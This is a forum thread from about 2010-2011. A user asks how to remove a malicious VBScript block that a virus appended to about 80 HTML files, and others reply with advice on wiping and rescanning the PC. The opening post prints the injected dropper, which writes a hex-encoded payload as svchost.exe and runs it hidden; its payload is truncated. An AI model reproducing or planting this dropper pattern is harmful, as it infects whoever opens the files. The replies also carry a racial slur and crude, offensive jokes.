Script to delete all code from file from * onwards?

-joe-

-joe-

Britfag
May 6, 2010
4,318
72
0
Just outside London, UK
Hi there,

Stupidly, I was tired this morning, so I clicked "stop blocking" when windows firewall came up with something about firefox.

As a result, I now have a virus. I think I've removed it, but it'll reactivate if I open the html files it's infected..

What it's done is fairly obvious, at the end of the html files, it's left <SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000loadsmorecodehere"

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=True Then
FSO.DeleteFile(DropPath)
End If
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
End If
//--></SCRIPT><!--83ϴ`;?t՝컮HѣȀی{{̵LM?vE^},ݓ?ȡ}䢱׺ϣԊe ͐?܍Ʋފ졤찬ּɘ'ڡ⼀;$lrۨߋ<)��ق7է=ѓ?/ɔ2כAfXƗ୽ƐԶ ֕³ﭏ?ɱѿ߾H{��݀��ࠂxͥ;]��=Τ8Ʊ3ʝgwʩߕ.nŧNX'ЈKٽٛ ´Y Zbލ"7灃5+Ϲޓ?閶æծ$'Ҹ@hT{ٜ߭hf˙��휜QDݬ:ۂawŏ؉žYژ).Λ]>ެƪ~��)ČڦFcÉ?ȯꙬ]u̱7pfԗФдGˏ?w



So, I have the list of the html files infected. Is it possible to make a vb file or something that'd delete everything from "<SCRIPT Language" onwards in ~80 html files? I had a look online, but couldn't find any solutions. :(

I know it's a bit different from the usual posts here, but hopefully this should be fairly simple?

Tits:

Tm0Wn.jpg
 


DONT DO WHAT ANYONE ELSE SUGGESTS

You have probably not deleted the virus. Wipe your PC. Backup the important shit, DO NOT BACK UP THE INFECTED SHIT EVEN IF YOU NEED IT AND THINK YOU CLEANED IT, and wipe your PC. Consider dumping PC in trash and getting a new one, because hardware level rootkits are a reality.

It's 2011, nigga, and I don't know enough about writing viruses to trust myself cleaning them off machines that are critical to my business and welfare, and (judging by nature of your question) you know even less than I do, so take my advice. At the very least, assume your whole OS is compromised, and assume you cannot recover it.

If I ever write software to leverage compromised machines ("a virus"), the first thing I'll do is add a file "virus.exe" to your desktop, hoping people delete this icon and feel placated. It would be stupid to assume any fix you "figured out" is good enough.
 
Hope this gives you some perspective -- Here's the fictional scenario that came to mind after reading your post.

"I think I might have AIDS because I slept with a South African whore, and the condom broke, but I pulled out and ducttaped it back together before finishing. Actually, I know I don't have AIDS, because she died the next morning of a drug overdose, not AIDS, and my heroine dealer was still willing to share a needle with me. He said 'Hey man, I wont do that, you might have AIDS. Aww, what the hell, I dont think you have AIDS, lets shoot up', and he's a professional drug dealer, so I trust what he has to say. I don't think I'll get tested for AIDS, and instead will be hosting an open-invitation unprotected sex party in my basement tonight for all to attend."

If you're smart, right now, you'll realize that an attacker had an unknown-degree-of-access to your compromised machine, and you'll assume you have AIDS.
 
^ This.

Just think about it for a second, I don't know about you but imagine if you knew you your PC was infected with an unknown virus and didn't have a clue what it does, wouldn't you be worried if everything is being compromised. Every single thing you type, every username, password, bank login, Paypal, Google, Facebook.

I know I'd do a full fucking wipe of that shit and start over.
 
Better yet, go spend less than $100 and put a new hard drive in your computer. Then you can back up your data at your leisure and know that you did not lose something important by forgetting to back it up.
 
uplinked said:
DONT DO WHAT ANYONE ELSE SUGGESTS

You have probably not deleted the virus. Wipe your PC. Backup the important shit, DO NOT BACK UP THE INFECTED SHIT EVEN IF YOU NEED IT AND THINK YOU CLEANED IT, and wipe your PC.
Click to expand...

Agreed, delete the infected files, back up everything else and wipe the system.

Consider dumping PC in trash and getting a new one, because hardware level rootkits are a reality.
Click to expand...
This is just fear mongering. Hardware rootkits are "experimental" at this phase because they have to be written for specific hardware (ie his exact video card brand/model) to work. It's highly improbable that a virus has been written for his exact hardware configuration. Actually it's more probable that the first wide scale use of hardware rootkits will attack Mac based computers due to the limited number of hardware configurations available.

It's 2011, nigga, and I don't know enough about writing viruses to trust myself cleaning them off machines that are critical to my business and welfare, and (judging by nature of your question) you know even less than I do, so take my advice. At the very least, assume your whole OS is compromised, and assume you cannot recover it.
Click to expand...
Agreed, delete infected files if your virus scanner won't clean them. Backup only critical items and wipe the drive. Install a good AV like Nod32 or Kaspersky and scan the backed up files before restoring them.

If I ever write software to leverage compromised machines ("a virus"), the first thing I'll do is add a file "virus.exe" to your desktop, hoping people delete this icon and feel placated. It would be stupid to assume any fix you "figured out" is good enough.
Click to expand...
Most viruses are very poorly written, they "take over" your system. They screw with your Internet settings, you can't get access to the Control Panel, user permissions are modified and other very annoying things. It would still be obvious to the end user that they are infected. So your "virus" would need to be a little more covert than the crap you see in the wild today.
 
Thanks for the replies everyone. I've scanned at the boot-time with avast, and also run hitman pro (which is probably the best scanner out there). I know they usually leave traces, but there have been a LOT of infected files cleared out, and I think it's been gotten rid of. I also cleared up the startup and services in msconfig. Before, it would occasionally change google search to some paid search, and stop me getting on certain websites (as well as all the standard control panel/permissions stuff). That's no longer happening. I also looked up the virus, seems I'm not gonna get spied on or anything - this is a major irc botnet, so worst that's gonna happen if it is still there is probably just some internet slowing from being used for bulk email/ddosing.

There's one element I haven't removed yet, I haven't replaced svchost.exe, but I'll have to go back into safe mode for that, so I'll do it later.

Is there any way at all to do this? :( *even if I have to reformat, I still want to keep this html files, they're pretty important. I don't want all this crap in them though*
 
Cheers for that onigen, I'll have a look on there :) +rep EDIT:[toomuchrepinpast24hours]

And dchuk, I would, but macs=no compatibility with loads of software, no games (except like pinball lol), and overpriced.

Linux would be a good option (dualbooted with windows for games) but again, there's compatibility issues, especially with network cards :(
 
You must log in or register to reply here.
Top Bottom